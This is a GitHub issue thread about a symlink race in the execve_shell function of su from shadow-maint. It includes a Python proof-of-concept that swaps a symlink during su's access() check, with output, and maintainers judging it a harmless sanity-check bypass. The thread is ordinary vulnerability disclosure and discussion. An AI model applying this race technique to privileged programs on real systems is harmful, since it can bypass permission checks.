### ISSUE TITLE
Su allows executing through execve_shell when target is non-executable

### ISSUE THREAD

**Issue by skyler-ferrante** [shadow-maint/shadow#735]
In function execve_shell (su.c) there is a check to access, then an execve.

```
if (access (shellname, R_OK|X_OK) == 0) {
                ...
                targs[2] = xstrdup (shellname);
                ...
                (void) execve (SHELL, targs, envp);
}
```

Access is used to make sure shellname is good to execute. Since we are referencing by filename, we can use TOCTOU. A user could already call `/bin/sh shellname` themselves, so bypassing this check doesn't really cause any damage.

Test.py
```
#!/bin/python3

import os
import time
from threading import Thread

# Remove old link
os.remove("link")

# Make link to 1
os.symlink("1", "link")

def do_su():
    # Run su
    os.system("../src/su -s ./link -c 1")

def do_toctou():
    #print(time.time())
    os.remove("link")
    os.symlink("2", "link")
    #print("TOCTOU")

thread1 = Thread(target = do_su)
thread2 = Thread(target = do_toctou)

thread1.start()
for i in range(100000):
    # Just for getting time right
    pass
thread2.start()
```

1 (Read/Write/Execute)
```
echo Okay to run
```

2 (Read/Write without Execute)
```
echo Should not have run
```

```
# ./test.py
Should not have run
# ./test.py
Should not have run
# ./test.py
Okay to run
# ./test.py
Cannot execute ./link
# ./test.py
Should not have run
# ./test.py
Should not have run
#
```

We can see `su` ran 2. 

Running the command inside test.py without TOCTOU outputs:

```
Cannot execute ./link
```

The user could run `/bin/sh 2` themselves, but it seemed that `su` wanted to check execute permission for some reason. Is the call to `access` not actually needed here? Should `su` be able to call non-executable shell scripts with `/bin/sh`?

**Comment by hallyn** [comment]
I think it's not so much a security check as a sanity check.

The whole block was added with 

```
commit 4ad827768ec5e446e82f3ee0be72c5f0785d8d16
Author: nekral-guest <nekral-guest@5a98b0ae-9ef6-0310-add3-de5d479b70d7>
Date:   Mon Jul 20 14:00:50 2009 +0000

            * NEWS, src/su.c, libmisc/shell.c: Added support for shells being a
            shell script without a shebang.
```

Really seems to me like an anti-feature.  But then these are different times.

**Comment by vapier** [comment]
agreed that this isn't a security issue.  if you have permission to execute a path, the contents of it are immaterial.

i suspect the intention was to mimic common shell behavior where you can `./foo` something without a shebang, and if it fails with ENOEXEC, it falls back to using system().  should be easy enough to replace the access() call with `errno == ENOEXEC`.  someone could argue that there's still a TOCTOU race between the first exec that triggered the `ENOEXEC` (vs `EACCES`).  just put a comment in there saying "all security checks have passed at this point, so there's no TOCTOU to be concerned about".

**Comment by vapier** [comment]
technically you could avoid the TOCTOU by opening+fstat, and then execing the shell on the open fd, but that gets a bit messy to find the filesystem-visible path, and it makes error diagnostics ugly/confusing.  since it's not a security concern, it's really not worth the effort.

**Comment by skyler-ferrante** [comment]
Okay, I figured, but I wasn't sure. I'll close the issue

**Comment by vapier** [comment]
imo we should still change the access() check to errno==ENOEXEC so that we better align with shell behavior

**Comment by hallyn** [comment]
> technically you could avoid the TOCTOU by opening+fstat, and then execing the shell on the open fd, but that gets a bit messy to find the filesystem-visible path, and it makes error diagnostics ugly/confusing. since it's not a security concern, it's really not worth the effort.

We could then just pass /proc/self/fd/N as the file to execute.  Though I'd worry about someone playing games with /proc.

**Comment by vapier** [comment]
yes, but as i said, that isn't exactly portable, and it makes errors confusing when the shell prints them.  instead of seeing `./foo: blah blah`, you'd see `/proc/self/fd/N: blah blah`.

i'll also note that, practically speaking, it doesn't fix the TOCTOU logic from a higher level perspective.  if you have write access to the path, you can rewrite the shell script as it's being read/parsed.  bash does not load the entire file into memory and then execute it, it reads the file as it parses it.
